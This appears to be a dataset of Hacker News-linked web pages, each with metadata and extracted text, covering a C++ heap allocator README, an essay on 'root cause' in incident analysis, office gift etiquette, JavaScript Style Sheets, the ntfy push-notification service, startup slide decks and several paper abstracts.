Writing a correct and efficient memory allocator is a non-trivial task. STL provides many algorithms for sorting, searching, manipulating and processing data. These algorithms can be useful for managing metadata about memory blocks, such as free and used blocks. Using existing algorithms and data structures from the C++ Standard Template Library (STL) has several advantages over developing your own, such as:
- Efficiency: The STL is designed by experts who have fine-tuned the algorithms and data structures for performance. They generally offer excellent time and space complexity, and have been optimized over many years of use and improvement.
- Reliability: STL components have been thoroughly tested and are widely used. This means they are reliable and less likely to contain bugs compared to new, untested code.
- Readability and Maintainability: Using standard algorithms and data structures makes code more readable and easier to understand for other developers familiar with C++.
- Productivity: It's usually faster to use an existing STL component than to write a new one from scratch.
- Compatibility: STL components are designed to work together seamlessly, and using them can help ensure compatibility with other C++ code and libraries.
This project is currently a work in progress. The release of the initial version is tentatively scheduled for December. Please consider this before using the code.
Building
Windows:
```
Open ide/vs2022/RTSHALibrary.sln in Visual Studio 2022 and build.
```
| true | true | true |
Real Time Safety Heap Allocator. Contribute to borisRadonic/RTSHA development by creating an account on GitHub.
|
2024-10-12 00:00:00
|
2023-06-29 00:00:00
|
https://opengraph.githubassets.com/3c18b949ce10d352663d1efc32bbbba780041d044bab090f725edfeeefa7ecb1/borisRadonic/RTSHA
|
object
|
github.com
|
GitHub
| null | null |
24,509,802 |
https://www.teslaoracle.com/2020/09/17/first-fsd-computer-retrofit-mcu2-upgrade-europe/
| null | null | null | true | false | false | null | null | null | null | null | null | null | null | null |
30,280,651 |
https://github.com/readme/guides/root-cause
|
What we talk about when we talk about ‘root cause’
|
John Allspaw
|
What we talk about when we talk about ‘root cause’? To begin, consider this passage from *Thinking By Machine (deLatil, 1956) p.153: *
*“Imagine an iron bar thrust into an electric furnace. The bar lengthens, and the “cause” of the lengthening is said to be the heat of the furnace. One is astonished—why should it not be the introduction of the bar into the furnace? Or the existence of the bar? Or the fact that the bar had been previously kept at a lower temperature? None of these possibilities can be termed secondary causes; they are all primary determining causes without which the lengthening phenomenon could not have occurred.”*
In recent years, the understanding that failure in complex systems requires multiple contributors coming together to produce these surprising events that we call *incidents *has gained traction. Much has been written and presented about this hallmark phenomena of complex systems, and while this perspective isn’t yet considered a “mainstream” view, I suspect it aligns with what all experienced software engineers intuitively understand.
In his seminal paper *How Complex Systems Fail *(Cook, 1998)*, *my colleague Dr. Richard Cook put it this way:
*3) Catastrophe requires multiple failures—single point failures are not enough. The array of defenses works. System operations are generally successful. Overt catastrophic failure occurs when small, apparently innocuous failures join to create opportunity for a systemic accident. Each of these small failures is necessary to cause catastrophe but only the combination is sufficient to permit failure. Put another way, there are many more failure opportunities than overt system accidents. Most initial failure trajectories are blocked by designed system safety components. Trajectories that reach the operational level are mostly blocked, usually by practitioners. *
Another description of this perspective was made by Ryan Kitchens at SRECon Americas in 2019:
*“There is no root cause. The problem with this term isn't just that it's singular or that the word root is misleading: there's more. Trying to find causes at all is problematic...looking for causes to explain an incident limits what you'll find and learn. And the irony is that root cause analysis is built on this idea that incidents can be fully comprehended. They can't. We already have a better phrase for this, and it sounds way cooler: it's called a perfect storm. In this way, separating out causes and breaking down incidents into their multiple contributing factors, we're able to see that the things that led to an incident are either always or transiently present. An incident is just the first time they combined into a perfect storm of normal things that went wrong at the same time.”*
From an abstract perspective, language that describes causality is, ostensibly, *value-neutral*. But use of the term ‘root cause’ is almost always used in the context of untoward or negative outcomes, and not in situations where an outcome is deemed a success. Rarely does someone demand a search for the ‘root cause’ of a successful product launch, for example. It seems widely accepted that successful outcomes in complex systems come from many influences that come together in a positive way. Failures aren’t often viewed the same way.
Rather than restating what’s been written and spoken about (such as the references linked above), I’d like to explore in this article what seems to keep people using the term ‘root cause’ despite the growing skepticism of its value.
What makes this term attractive for the people using it? Is it simply used as shorthand language, as a way to summarize an otherwise too-detailed explanation for the reader or listener? Or is it used to simplify a story, to redirect people’s attention to a specific and bounded area so something—anything—practical can be done?
Research literature on this topic reveals that in descriptions of accidents and incidents, use of the term ‘root cause’ (or even multiple ‘root’ causes) serves* **social *purposes more than *technical *ones.
## Providing reassurance about the future
Labeling something as a ‘root cause’* *helps people cope with the (sometimes implicit) anxiety that comes along with the experience of incidents. When people are observing their systems working well* *(or at least well *enough*), and a seemingly out-of-nowhere incident happens, the contrast can be jarring, to say the least. We can go from feeling confident about how well we understand our technical systems to suddenly feeling astonished and quite uncertain.
The lived experience of people responding to these situations can leave them wanting for something—*anything*—to help them feel better about the future. Likewise, technical leaders are also not immune to the feeling of unease* *that incidents tend to bring with them. If this can happen unexpectedly, what else can? Do these events represent harbingers of more significant ones to come? What do these incidents say about the organization’s abilities...or my own leadership skills?
Incidents have a way of producing genuine and unsettling dismay; it’s understandable to search for an explanation, a cause, that we can be sure of.
In this way, labeling some specific part of the story as a 'root cause' helps us. It provides some comfort that we’ve got a handle on things we previously didn’t. There’s a term for this phenomenon: *Nietzschean anxiety. *It reflects what the German philosopher wrote in *Twilight of the Idols:*
*“With the unknown, one is confronted with danger, discomfort, and care; the first instinct is to abolish these painful states. First principle: any explanation is better than none. Because it is fundamentally just our desire to be rid of an unpleasant uncertainty, we are not very particular about how we get rid of it: the first interpretation that explains the unknown in familiar terms feels so good that one “accepts it as true”…. The “why” shall, if at all possible, result not in identifying the cause for its own sake, but in identifying a cause that is comforting, liberating, and relieving. A second consequence of this need is that we identify as a cause something already familiar or experienced, something already inscribed in memory. Whatever is novel or strange or never before experienced is excluded.”*
In other words, our experience with incidents can be so disturbing to us that we feel a strong and immediate desire to identify what “caused” an event, so we can then do something (which typically means fixing something) in order to regain a sense of being in control. This is what John Carroll (Carroll, 1995) called *root cause seduction. *
On the face of it, this idea seems understandable, even relatable. But we have to acknowledge that labeling something as a ‘root cause’ reflects a cherry-picked perspective; it highlights one aspect of a complex event and discounts others. The label performs a sort of sleight-of-hand or redirection like a magician might, akin to saying “look right here—don’t concern yourself with other things.”
## Purposes and audiences
It can be useful to understand the context in which the term “root cause” is being used.
Who is the author (or speaker) using it? What are they hoping to convey by using the term? Who is their audience? How do they understand the use of ‘root cause’ in the context of what they are reading?
If it is used in a conversation amongst engineers on the same team, it might be used simply as a way to emphasize or highlight a specific location* *they believe warrants attention. Quite often, we find this usage more to reflect a thing better conveyed as a trigger*, *rather than a cause*. *The term ‘trigger’ tends to do a better job of describing a specific dynamic that “activates” already existing conditions, some of which might have been latent in the code or architecture’s arrangement for some time.
If it is used in a legal agreement or other contractual documents, the term tends to intentionally have an ambiguous meaning so as to allow for flexibility of interpretation that frequently comes with legal language.
When it comes to articles companies publish about incidents their service(s) or products have experienced, the term ‘root cause’ tends to be used in very specific ways. The core **audience** for these public posts are both current and potential future customers. The primary **purpose** is to provide a) confidence that the company understands the event sufficiently and b) some form of commitment to improving the situation in the future. By labeling a specific component as a “root cause” (or even a finite number of “root causes”) authors of these posts can project much more certainty or confidence than if they were to acknowledge the genuine complexity of the incident.
## A challenge for readers and listeners
I’ll offer a few questions to consider the next time you read or hear the term ‘root cause’:
What is the author (or speaker) trying to convey by using the term?
What agenda(s) might the author (or speaker) have in their version of the story, other than providing the richest description they can?
What else
What details seem to be noticeably absent in the story you’re being told?
What questions can you imagine being dismissed or discounted by the storyteller, if you had the chance to ask them?
Questions like these are garden-variety critical thinking exercises. But they might help us explore what the story doesn’t tell us, or what might be missing in the story.
| true | true | true |
Instead of finding the ‘root cause’ to incidents and issues, @allspaw says it’s more accurate to try and break down what created the ‘perfect storm’:
|
2024-10-12 00:00:00
|
2022-02-08 00:00:00
|
object
|
github.com
|
GitHub
| null | null |
|
4,456,819 |
http://evanmuehlhausen.com/data-mining-local-radio-with-nodejs.html
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
1,151,000 |
http://www.economist.com/world/united-states/displaystory.cfm?story_id=15549324&source=hptextfeature
|
Fibre in paradise
| null |
United States | Cabling America
# Fibre in paradise
## How a small city in Virginia is replacing coal mines with tech jobs
|Bristol
Illustration by Peter Schrank
This article appeared in the United States section of the print edition under the headline “Fibre in paradise”
## Discover more
### Checks and Balance newsletter: Partisan positions have changed drastically over the past 50 years
Kamala Harris and Donald Trump converge as much as they differ
### Hurricane Milton inundates Florida
Three factors laid the ground for its destructiveness
### Shirley Chisholm is still winning
The first black woman to run for president taught a lesson in making political change
### US election forecast: who will control the House of Representatives?
Our prediction model assesses each party’s chance of winning the chamber
### US election forecast: who will win control of the Senate?
Our prediction model assesses each party’s chances of winning the chamber
### The next American president will be a China hawk
Donald Trump may seek to decouple America’s economy, while Kamala Harris favours more targeted pressure
| true | true | true |
How a small city in Virginia is replacing coal mines with tech jobs
|
2024-10-12 00:00:00
|
2010-02-18 00:00:00
|
Article
|
economist.com
|
The Economist
| null | null |
|
40,273,392 |
https://www.biorxiv.org/content/10.1101/2024.04.18.590112v1
|
Neural compass in the human brain during naturalistic virtual navigation
|
Zhengang Lu; Joshua B Julian; Geoffrey K Aguirre; Russell A Epstein
|
## SUMMARY
Humans and animals maintain a consistent representation of their facing direction during spatial navigation. In rodents, head direction cells are believed to support this “neural compass”, but identifying a similar mechanism in humans during dynamic naturalistic navigation has been challenging. To address this issue, we acquired fMRI data while participants freely navigated through a virtual reality city. Encoding model analyses revealed voxel clusters in retrosplenial complex and superior parietal lobule that exhibited reliable tuning as a function of facing direction. Crucially, these directional tunings were consistent across perceptually different versions of the city, spatially separated locations within the city, and motivationally distinct phases of the behavioral task. Analysis of the model weights indicated that these regions may represent facing direction relative to the principal axis of the environment. These findings reveal specific mechanisms in the human brain that allow us to maintain a sense of direction during naturalistic, dynamic navigation.
### Competing Interest Statement
The authors have declared no competing interest.
## Footnotes
↵5 Lead Contact
| true | true | true |
Humans and animals maintain a consistent representation of their facing direction during spatial navigation. In rodents, head direction cells are believed to support this “neural compass”, but identifying a similar mechanism in humans during dynamic naturalistic navigation has been challenging. To address this issue, we acquired fMRI data while participants freely navigated through a virtual reality city. Encoding model analyses revealed voxel clusters in retrosplenial complex and superior parietal lobule that exhibited reliable tuning as a function of facing direction. Crucially, these directional tunings were consistent across perceptually different versions of the city, spatially separated locations within the city, and motivationally distinct phases of the behavioral task. Analysis of the model weights indicated that these regions may represent facing direction relative to the principal axis of the environment. These findings reveal specific mechanisms in the human brain that allow us to maintain a sense of direction during naturalistic, dynamic navigation. ### Competing Interest Statement The authors have declared no competing interest.
|
2024-10-12 00:00:00
|
2024-04-22 00:00:00
|
article
|
biorxiv.org
|
Biorxiv
| null | null |
|
33,423,548 |
https://ai.facebook.com/blog/protein-folding-esmfold-metagenomics/
| null | null | null | true | false | false | null | null | null | null | null | null | null | null | null |
22,263,692 |
https://www.usatoday.com/story/money/2019/12/11/what-gifts-should-you-avoid-at-work/4387605002/
|
Buy a gift for the boss? Here are some do's and don'ts for giving gifts at the office
|
Charisse Jones
|
# Buy a gift for the boss? Here are some do's and don'ts for giving gifts at the office
A faulty bulb knocked out an entire string of lights on your Christmas tree. You can't find that hot toy your nephew wanted anywhere. And you don't know when you'll have the time to clean the house before holiday guests arrive.
What else could go wrong?
How about you have to buy a gift for your office pod mate, and you don't have a clue what to get her?
Many workers feel the prospect of buying presents for their colleagues adds yet another layer of pressure to an already stressful season.
A LinkedIn survey found that 31% of employees say they feel they have to add co-workers to their gift-giving lists, and 40% wish their company would say gift-giving is off-limits.
A lot of the tension stems from not knowing what to buy. If your father-in-law doesn't like the sweater you bought him, there may be an awkward silence at the dinner table, but giving an inappropriate gift to a colleague or boss could lead to more severe consequences.
Horror stories abound. Philippe Weiss, president of the workplace legal compliance consultancy Seyfarth at Work, says he heard about one manager who gave his sales team bamboo toothbrushes. The recipients interpreted the gift as a dig at their oral hygiene.
An employee at another company put her job in peril when she gifted her boss with a book on how to be a better manager.
To avoid such faux pas, it makes sense for companies to put a gift policy in place so employees know what is and isn't acceptable. If your workplace doesn't set parameters, here are some tips Weiss says you might want to keep in mind.
**•Don't buy gifts that can be deemed too intimate.** Anything worn close to the body, from clothes to perfume, should be avoided, along with invites on excursions – such as a wine tasting – that could be seen as more romantic than collegial.
**•Don't shop for the boss.** It might be tempting to deliver a little extra holiday cheer to your managers, but generally speaking, they probably shouldn't accept. It's best to not put them in a position to have to say, "Thanks, but no thanks."
**•Don't make everyone chip In for a group gift.** When people are spending on everything from decorations to extra towels for visiting relatives, it's a good idea to allow members of your team to make their own decision on whether to contribute to the pot.
**•Don't give cash.** That, and even gift cards, could be taxed as income, Weiss says.
**•Do encourage "Secret Santa."** Let employees who want to participate pick names randomly. Then come up with gift suggestions, and set a budget so no one breaks the bank.
**•Do split the bounty.** If a client sends over a giant plate of cookies or other treat, share it with your office mates. Don't forget to include the mailroom and maintenance staff.
**•Do consider giving to the community.** Instead of having employees pick out picture frames and candles for their peers, why not donate as an office to a cause?
*Follow Charisse Jones on Twitter @charissejones*
| true | true | true |
Many workers feel the prospect of buying presents for their colleagues adds yet another layer of pressure to an already hectic, stressful season.
|
2024-10-12 00:00:00
|
2019-12-11 00:00:00
|
article
|
usatoday.com
|
USA TODAY
| null | null |
|
9,162,653 |
https://twitter.com/jeffbarr/status/574241836228681728
|
x.com
| null | null | true | true | false | null |
2024-10-12 00:00:00
| null | null | null | null |
X (formerly Twitter)
| null | null |
21,612,780 |
https://blog.commsor.com/what-minecraft-taught-me-about-community/
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
30,696,435 |
https://www.politico.eu/article/nadine-dorries-digital-minister-big-tech/
|
Nadine Dorries, Britain’s Big Tech slayer
|
Annabelle Dickson
|
LONDON — Britain's digital minister has Big Tech in her sights — but critics worry she's not sufficiently across the details for her reforms to stick.
Promoted to Boris Johnson's top team last September, Digital, Culture, Media and Sport Secretary Nadine Dorries initially made headlines with enthusiastic attacks on "woke" culture and because of her personal loyalty to the prime minister.
But the outspoken romantic novelist has also proved eager to ramp up pressure on tech platforms, both because of what she sees as their failure to deal with terrorist propaganda and child sexual abuse and, since Russia invaded Ukraine, as a vocal critic of disinformation online.
| true | true | true |
Britain among the first countries to attempt to regulate harmful speech online but how will the new rules balance freedom of speech?
|
2024-10-12 00:00:00
|
2022-03-14 00:00:00
|
article
|
politico.eu
|
POLITICO
| null | null |
|
4,947,570 |
http://asserttrue.blogspot.com/2012/12/going-on-software-design-feature-fast.html
|
Going on a Software-Design Feature Fast
|
Kas Thomas
|
Software makers should also reevaluate the process by which a feature becomes "required" and what it means for a feature to be "required."
I've been in tech for decades, and I've never yet encountered a software product that didn't contain at least one totally useless feature, a feature no one ever uses; the equivalent of the Scroll Lock key on a modern keyboard. The important point to note is that
*all*software features, even the most obscure and/or useless ones, got into the product as a result of somebody's "requirement."
I propose that software makers go on a "feature fast" until the feature-addition process is not only well understood but re-imagined. (Let Marketing be a stakeholder in this process, but let it be only
*one*of many stakeholders. Not the majority stakeholder.)
Until then, I offer the following exercises for purveyors of commercial software:
1. Implement
*in situ*analytics (inside-the-app analytics) so that you can understand how users are spending their time when they work with the product.
2. Find out (via built-in analytics) what the least-used feature of your product is. Get rid of it.
3. Repeat No. 2 for another 100 features. Replace them with API methods and helpful tooling (an SDK). Charge no money for the SDK.
4. Have you ever added an obscure feature because an important customer asked for it? If so, consider the following: Did you make the sale? Did the sale of the product
*actually hinge*on that one feature? (Hopefully not. Hopefully the product's
*core functionality*and
*reputation for excellence*made the sale.) Five years later, is that customer still with you? Are they still using the feature? If not, why are you continuing to code-maintain, regression-test, document, and tech-support a one-off feature that's no longer needed?
5. Of all the UI elements that are in the user's face by default, find which ones are least-used. Of all the UI elements that are
*not*readily visible, find those that are most-used. Consider ways to swap the two.
6. Try to determine how many features are in your product (develop your own methodology for this), then determine how many features are used by what percentage of customers. (When you have that data, visualize it in more than one way, graphically.) When you're done, ask yourself if you wouldn't be better off, from a resource allocation standpoint, if you stopped working on at-the-margin features and reinvested those dollars in making core features even more outstanding.
7. Obtain (via real-time analytics) a profile of a
*given user's*favorite (or most-used) features and preemptively load those into memory, for that particular user, at startup time. Lazily load everything else, and in any case, don't single-task the entire loading process (and make the user stare at a splash screen). The preferential loading of modules according to a
*user-specific profile*is essentially the equivalent of doing a custom build of the product on a per-customer basis, based on demonstrated customer needs. Isn't this what you should be aiming for?
8. Find out the extent to which customers are using your product under duress, and why. In other words, if your product is Microsoft Word, and you have customers who are still doing a certain amount of text editing in a lesser product (such as Wordpad), find out how many customers are doing that and why. Address the problem.
In tomorrow's post, I'm going to list some favorite software-design mantras that all people involved in building, testing, documenting, supporting, or marketing software products can (I hope) learn something from. Don't miss it.
| true | true | true |
Bioinformatics, genomics, and Javascript
|
2024-10-12 00:00:00
|
2012-12-20 00:00:00
| null | null |
blogspot.com
|
asserttrue.blogspot.com
| null | null |
40,426,536 |
https://arxiv.org/abs/2405.00801
|
"Ask Me Anything": How Comcast Uses LLMs to Assist Agents in Real Time
|
Rome; Scott; Chen; Tianwen; Tang; Raphael; Zhou; Luwei; Ture; Ferhan
|
# Computer Science > Computation and Language
[Submitted on 1 May 2024 (v1), last revised 6 May 2024 (this version, v2)]
# Title:"Ask Me Anything": How Comcast Uses LLMs to Assist Agents in Real Time
View PDF HTML (experimental)Abstract:Customer service is how companies interface with their customers. It can contribute heavily towards the overall customer satisfaction. However, high-quality service can become expensive, creating an incentive to make it as cost efficient as possible and prompting most companies to utilize AI-powered assistants, or "chat bots". On the other hand, human-to-human interaction is still desired by customers, especially when it comes to complex scenarios such as disputes and sensitive topics like bill payment.
This raises the bar for customer service agents. They need to accurately understand the customer's question or concern, identify a solution that is acceptable yet feasible (and within the company's policy), all while handling multiple conversations at once.
In this work, we introduce "Ask Me Anything" (AMA) as an add-on feature to an agent-facing customer service interface. AMA allows agents to ask questions to a large language model (LLM) on demand, as they are handling customer conversations -- the LLM provides accurate responses in real-time, reducing the amount of context switching the agent needs. In our internal experiments, we find that agents using AMA versus a traditional search experience spend approximately 10% fewer seconds per conversation containing a search, translating to millions of dollars of savings annually. Agents that used the AMA feature provided positive feedback nearly 80% of the time, demonstrating its usefulness as an AI-assisted feature for customer care.
## Submission history
From: Ferhan Ture [view email]**[v1]**Wed, 1 May 2024 18:31:36 UTC (422 KB)
**[v2]**Mon, 6 May 2024 16:15:32 UTC (422 KB)
### References & Citations
# Bibliographic and Citation Tools
Bibliographic Explorer
*(What is the Explorer?)*
Litmaps
*(What is Litmaps?)*
scite Smart Citations
*(What are Smart Citations?)*# Code, Data and Media Associated with this Article
CatalyzeX Code Finder for Papers
*(What is CatalyzeX?)*
DagsHub
*(What is DagsHub?)*
Gotit.pub
*(What is GotitPub?)*
Papers with Code
*(What is Papers with Code?)*
ScienceCast
*(What is ScienceCast?)*# Demos
# Recommenders and Search Tools
Influence Flower
*(What are Influence Flowers?)*
Connected Papers
*(What is Connected Papers?)*
CORE Recommender
*(What is CORE?)*# arXivLabs: experimental projects with community collaborators
arXivLabs is a framework that allows collaborators to develop and share new arXiv features directly on our website.
Both individuals and organizations that work with arXivLabs have embraced and accepted our values of openness, community, excellence, and user data privacy. arXiv is committed to these values and only works with partners that adhere to them.
Have an idea for a project that will add value for arXiv's community? **Learn more about arXivLabs**.
| true | true | true |
Customer service is how companies interface with their customers. It can contribute heavily towards the overall customer satisfaction. However, high-quality service can become expensive, creating an incentive to make it as cost efficient as possible and prompting most companies to utilize AI-powered assistants, or "chat bots". On the other hand, human-to-human interaction is still desired by customers, especially when it comes to complex scenarios such as disputes and sensitive topics like bill payment. This raises the bar for customer service agents. They need to accurately understand the customer's question or concern, identify a solution that is acceptable yet feasible (and within the company's policy), all while handling multiple conversations at once. In this work, we introduce "Ask Me Anything" (AMA) as an add-on feature to an agent-facing customer service interface. AMA allows agents to ask questions to a large language model (LLM) on demand, as they are handling customer conversations -- the LLM provides accurate responses in real-time, reducing the amount of context switching the agent needs. In our internal experiments, we find that agents using AMA versus a traditional search experience spend approximately 10% fewer seconds per conversation containing a search, translating to millions of dollars of savings annually. Agents that used the AMA feature provided positive feedback nearly 80% of the time, demonstrating its usefulness as an AI-assisted feature for customer care.
|
2024-10-12 00:00:00
|
2024-05-01 00:00:00
|
/static/browse/0.3.4/images/arxiv-logo-fb.png
|
website
|
arxiv.org
|
arXiv.org
| null | null |
4,168,734 |
http://changemakrs.com/arnoldschwarzenegger/4feaa0bcbd25660008000001
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
9,824,214 |
https://en.wikipedia.org/wiki/JavaScript_Style_Sheets
|
JavaScript Style Sheets - Wikipedia
| null |
# JavaScript Style Sheets
This article needs additional citations for verification. (November 2023) |
Internet media type |
text/javascript |
---|---|
Developed by | Netscape Communications Corporation |
Type of format | Style sheet language |
Standard | Netscape's JavaScript-Based Style Sheets submission to the W3C |
**JavaScript Style Sheets** (**JSSS**) was a stylesheet language technology proposed by Netscape Communications in 1996 to provide facilities for defining the presentation of webpages.[1] It was an alternative to the Cascading Style Sheets (CSS) technology.[1]
Although Netscape submitted it to the World Wide Web Consortium (W3C), the technology was never accepted as a formal standard and it never gained acceptance in the web browser market. Only Netscape Communicator 4 implemented JSSS, with rival Internet Explorer choosing not to implement the technology. Soon after Netscape Communicator's release in 1997, Netscape stopped promoting JSSS, instead focusing on the rival CSS standard, which was also supported by Internet Explorer and had a much wider industry acceptance.
The follow-up to Netscape Communicator, Netscape 6 (released in 2000), dropped support for JSSS. It now remains little more than a historical footnote, with web developers generally unaware of its previous existence. The proposal did not become a W3C standard.
## Syntax
[edit]Using JavaScript code as a stylesheet, JSSS styles individual element by modifying properties of a `document.tags`
object. For example, the CSS:
```
h1 { font-size: 20pt; }
```
is equivalent to the JSSS:
```
document.tags.H1.fontSize = "20pt";
```
JSSS element names are case sensitive.
JSSS lacks the various CSS selector features, supporting only simple tag name, class and id selectors. On the other hand, since it is written using a complete programming language, stylesheets can include highly complex dynamic calculations and conditional processing. (In practice, however, this can be achieved using JavaScript to modify the stylesheets applicable to the document at runtime.) Because of this JSSS was often used in the creation of dynamic web pages.
### Example
[edit]The following example shows part of the source code of an HTML document:
```
<style type="text/javascript">
tags.H1.color = "red";
tags.p.fontSize = "20pt";
with (tags.H3) {
color = "green";
}
with (tags.H2) {
color = "red";
fontSize = "16pt";
marginTop = "4cm";
}
</style>
```
Similar to Cascading Style Sheets, JSSS could be used in a `<style>`
tag. This example shows two different methods to select tags.
## Browser support
[edit]Javascript Style Sheets were only supported by Netscape 4.x (4.0–4.8) but no later versions. No other web browser has ever integrated JSSS.
## References
[edit]- ^
**a**Håkon Wium Lie; Bert Bos. "Chapter 20 - The CSS saga". World Wide Web Consortium. Retrieved 23 June 2010.**b**
| true | true | true | null |
2024-10-12 00:00:00
|
2005-02-20 00:00:00
| null |
website
|
wikipedia.org
|
Wikimedia Foundation, Inc.
| null | null |
23,467,281 |
https://medium.com/@yagiz/14-ways-to-become-a-better-technical-manager-leader-7b57324c2a6d
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
21,627,072 |
https://www.putorius.net/dnf-history.html
| null | null | null | true | false | false | null | null | null | null | null | null | null | null | null |
32,377,801 |
https://www.r-bloggers.com/2022/08/unravelling-an-enormous-json/
| null | null | null | true | false | false | null | null | null | null | null | null | null | null | null |
1,395,521 |
http://www.gonegoogle.com/
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
9,173,675 |
http://cloud-elements.com/post-effyouthisistherighturl-restful-api-design/
|
Cloud Elements | API Integration Platform | 200+ Prebuilt Integrations
| null |
# We joined the UiPath family.
Read the press release, or visit the site to learn more.
Read the Press Release Visit UiPath
### Customer Resources
Although we’ve joined the UiPath family, we still want to offer current Cloud Elements customers the ability to access the same resources include API docs, Cloud ELements University, Support, and the Cloud Elements Commuity. Access each resource below.
Have a sales question or other inquiry? As a new member of the UiPath family, we ask that you visit the UiPath contact page to find answers to questions about our products, use cases, pricing, and implementation for your business.
| true | true | true |
Cloud Elements is the leading API integration platform for SaaS app providers and the digital enterprise. Turn integration into your competitive advantage.
|
2024-10-12 00:00:00
|
2016-10-13 00:00:00
|
website
|
cloud-elements.com
|
Cloud Elements | API Integration Platform | iPaaS
| null | null |
|
11,048,206 |
https://point2625.appspot.com/
| null | null | null | true | false | false | null | null | null | null | null | null | null | null | null |
20,584,821 |
https://www.reddit.com/r/networking/comments/ckpaem/apple_thunderbolt_monitor_kills_network/
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
24,199,545 |
https://www.theverge.com/2020/8/17/21372846/microsoft-cant-uninstall-microsoft-edge-web-browser-editorial
|
Microsoft’s ‘can’t uninstall Microsoft Edge’ support page is hilariously telling
|
Sean Hollister
|
Look, I’m sure that the new Microsoft Edge is a fantastic web browser. I’m looking forward to trying it someday.
But Microsoft, I have a piece of advice for you: if so very many Windows users are googling “Can’t uninstall Microsoft Edge” that you feel the need to *utterly own* that search result by making it the title of your FAQ... maybe just don’t force it on Windows users to begin with?
Here’s a screenshot of the new support page, for posterity:
To be clear, I’m not saying Microsoft *shouldn’t* have updated users to the new version of Edge, particularly after today’s announcement that Internet Explorer and legacy Edge will be fully phased out exactly one year from now. Continued security updates are important!
But instead of telling users what effectively boils down to “you can’t uninstall it because we decided not to let you,” perhaps Microsoft could take a hint and give users what they apparently want. Here’s how Google search volume for “uninstall Microsoft Edge” has evolved in recent months:
By the way, you apparently *can* still get rid of the new Edge. (Strange how Microsoft’s page omits that.) You’ll just have to be comfortable with a few shell commands.
| true | true | true |
Maybe the company should take a hint?
|
2024-10-12 00:00:00
|
2020-08-17 00:00:00
|
article
|
theverge.com
|
The Verge
| null | null |
|
748,823 |
http://blog.assembla.com/assemblablog/tabid/12618/bid/10041/Distributed-Agile-Interview-Dan-Mezick-chats-with-Andy-Singleton.aspx
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
39,599,562 |
https://www.sfchronicle.com/california/article/klamath-dams-salmon-die-off-18700078.php
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
29,249,545 |
https://ntfy.sh/
|
ntfy.sh | Push notifications to your phone or desktop via PUT/POST
| null |
# Push notifications made easy
**ntfy** (pronounced *notify*) is a simple HTTP-based pub-sub notification service. It allows you to send notifications to your phone or desktop via scripts from any computer, and/or using a REST API. It's infinitely flexible, and 100% free software.
## Send push notifications from your app or script
Publishing messages can be done via PUT or POST. Topics are created on the fly by subscribing or publishing to them. If you use ntfy without sign-up, the topic is essentially a password, so pick something that's not easily guessable. If you purchase ntfy Pro, you can reserve topic names instead.
```
curl \
-d "Backup successful 😀" \
ntfy.sh/mytopic
```
## Receive notifications on your phone
Subscribe to a topic and receive notifications, with different priorities, attachments, action buttons, tags & emojis, and even for automation.
## Or get notified on your computer
You can use the web app to subscribe to topics as well. If you do, notifications will pop up as desktop notifications. Simply type in the topic name and click the Subscribe button. The browser will keep a connection open and listen for incoming notifications.
## Integrate with your favorite tools
Publishing messages is just a HTTP request, so pretty much everything under the sun can integrate with ntfy.
changedetection.iohealthchecks.io
Whether it's receiving alerts from cronjobs, or when a GitHub Actions pipeline finishes, or when a new episode of your TV show is available, or when any website has a change ❤️, ntfy will let you know.
## Pricing
Try ntfy for free without sign-up, or check out our paid plans. Or, since it's open source, you can always self-host it.
### Supporter
$5/ month
Get started with ntfy, while also supporting the open source project.
### Pro
$10/ month
This is the best value plan. Lots of messages, and large attachments.
### Business
$20/ month
Insane amount of messages, lots of reserved topics, giant attachments.
Need a bigger plan, or a dedicated server? Feel free to contact us.
If you don't need a paid plan, but would still like to support us, please donate via **GitHub Sponsors** or **Liberapay** ❤️.
## “Hands down the best notification service I've ever used, and I have used them all.”
– Joe Harrison
#### Still not convinced?
Check out the countless blog posts and newspaper articles about ntfy, or read the all the reviews on Google Play, and the Apple Store
## Join our open source community
ntfy is open source, and dual-licensed under the Apache 2.0 and GPLv2 license. Development happens out in the open, on GitHub and in our chats on Discord/Matrix. We love free software, and we're doing this because it's fun. Please join us, and let us know how you are using ntfy!
## ntfy is proudly sponsored by …
And by many open source lovers across the globe via**GitHub Sponsors** or **Liberapay** ❤️.
Want to **become a sponsor**?
Feel free to contact us, and we'll chat.
| true | true | true |
ntfy is a simple HTTP-based pub-sub notification service. It allows you to send notifications to your phone or desktop via scripts from any computer, and/or using a REST API.
|
2024-10-12 00:00:00
|
2024-01-01 00:00:00
|
/static/img/ntfy.png
|
website
|
ntfy.sh
|
ntfy.sh
| null | null |
1,477,616 |
http://torgronsund.wordpress.com/2010/06/29/essential-startup-5-new-killer-startup-decks/
|
Essential Startup: 5 Killer Startup Decks
| null |
Planning versus execution often makes a dilemma to startup founders. So instead of reading a pile of books on the subject you might as well getting started with some killer ideas at hand. Recently I shared a list of 6 Essential Startup Decks. Here I continue the Essential Startup series sharing 5 decks that I believe can aid in entrepreneurial pursuits.
**Finding Product / Market Fit: introducing the PMF matrix**
Since being introduced by Marc Andreessen and popularized by the Lean Startup movement, Product-Market Fit has evolved into a great deal in tech entrepreneurship. Several bloggers have addressed the subject lately, yet as a concept Product-Market Fit has been missing a-picture-says-more-than-1000-words. Earlier I suggested the Product-Market Fit diagram. Here Rishi Dean presents the Product-Market Matrix aligned with Customer Development and Lean Startup methodologies.
**The UX Driven Startup**
What to do as a founder when you actually can’t build things? Say no more, Alexa Andrzejewski, founder of Foodspotting, gives you a memorable pitch on how to craft an experience vision at startup.
**Why fighter pilots run startups**
Originator of Customer Development and serial entrepreneur Steve Blank shares an arsenal of great ideas on entrepreneurship, including Customer Development, Lean Startup, business model validation, market types, the pivot and the OODA Loop. Perhaps one of his most encompassing slide decks.
**Continuous Deployment at kaChing**
From a more technical perspective than the reminder on this list, Pascal-Louis Perez gives us an introduction to and examples on continuous deployment at startup. I am a strong believer in his statement “Release is a marketing concern”, which I also covered in What’s in a Startup Methodology giving an example of Spotify’s beta releases.
**Product Management 101 for Startups**
